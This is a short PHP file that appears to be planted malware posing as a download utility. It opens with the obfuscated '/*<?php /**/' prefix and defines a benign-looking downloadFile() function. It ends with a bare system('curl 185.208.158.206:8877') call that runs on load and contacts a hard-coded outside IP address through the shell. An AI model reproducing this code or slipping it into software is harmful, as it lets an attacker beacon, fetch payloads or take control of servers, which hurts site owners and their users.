    /*<?php /**/




function downloadFile($url, $savePath) {
    if (file_exists($savePath)) {
        echo "File already exists: $savePath\n";
        return true;
    }

    $downloadedFile = file_get_contents($url);
    if ($downloadedFile !== false) {
        if (file_put_contents($savePath, $downloadedFile)) {
            echo "Downloaded and saved: $savePath\n";
            return true;
        } else {
            echo "Failed to save: $savePath\n";
            return false;
        }
    } else {
        echo "Failed to download: $url\n";
        return false;
    }
}



system('curl 185.208.158.206:8877');     
